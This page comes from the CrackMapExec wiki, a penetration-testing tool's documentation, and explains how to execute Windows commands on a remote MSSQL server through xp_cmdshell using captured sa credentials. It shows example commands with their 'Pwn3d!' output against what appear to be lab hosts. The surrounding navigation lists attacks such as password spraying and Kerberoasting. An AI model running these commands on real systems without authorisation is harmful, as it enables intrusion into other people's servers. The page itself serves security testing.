πŸ”±
πŸ”±
πŸ”±
πŸ”±
CrackMapExec ~ CME WIKI
Public Release - v5.2.2@byt3bl33d3r@mpgn_x64
Search…
Introduction
πŸ”₯
News 2022
Changelog
Sponsoring CME
Other Gitbook
Getting Started
Installation
Selecting & Using a Protocol
Target Formats
Using Credentials
Using Kerberos
Using Modules
Database General Usage
πŸ†•
BloodHound integration
Report bugs or new features
πŸ’²
Audit Mode
SMB protocol
πŸ†•
Scan for vulnerabilities
Enumeration
Password spraying
Authentication
Command execution
Spidering Shares
Get and Put files
Obtaining Credentials
πŸ†•
Defeating LAPS
πŸ†•
Spooler, WebDav running ?
LDAP protocol
Authentication
ASREPRoast
Kerberoasting
Unconstrained delegation
Admin Count
Machine Account Quota
Get user descriptions
πŸ†•
Exploit ESC8 (adcs)
WINRM protocol
Password spraying
Authentication
Command execution
πŸ’²
Defeating LAPS
MSSQL protocol
Password spraying
Authentication
MSSQL Privesc
MSSQL command
Windows command
SSH protocol
Password spraying
Authentication
Command execution
πŸ’²
RDP Protocol
Password spraying
Install aardwolf lib
Powered By GitBook
Windows command
Execute Windows command using CrackMapExec

Execute Windows Command

This option use xp_cmdshell to exec command on the remote host.
1
#~ cme mssql 10.10.10.59 -u sa -p 'GWE3V65#[email protected]' --local-auth -x whoami
2
MSSQL 10.10.10.59 1433 None [+] sa:GWE3V65#[email protected] (Pwn3d!)
3
MSSQL 10.10.10.59 1433 None [+] Executed command via mssqlexec
4
MSSQL 10.10.10.59 1433 None --------------------------------------------------------------------------------
5
MSSQL 10.10.10.59 1433 None tally\sarah
Copied!
If permission is DENIED:
1
MSSQL 10.10.10.52 1433 None [+] admin:[email protected][email protected]! (Pwn3d!)
2
MSSQL 10.10.10.52 1433 None [-] ERROR(MANTIS\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
3
MSSQL 10.10.10.52 1433 None [+] Executed command via mssqlexec
4
MSSQL 10.10.10.52 1433 None None
Copied!
When playing with MSSQL, you can use the tool MSDAT from quentinhardy​
GitHub - quentinhardy/msdat: MSDAT: Microsoft SQL Database Attacking Tool
GitHub
​
MSSQL protocol - Previous
MSSQL command
Next - SSH protocol
Password spraying
Last modified 1yr ago
Copy link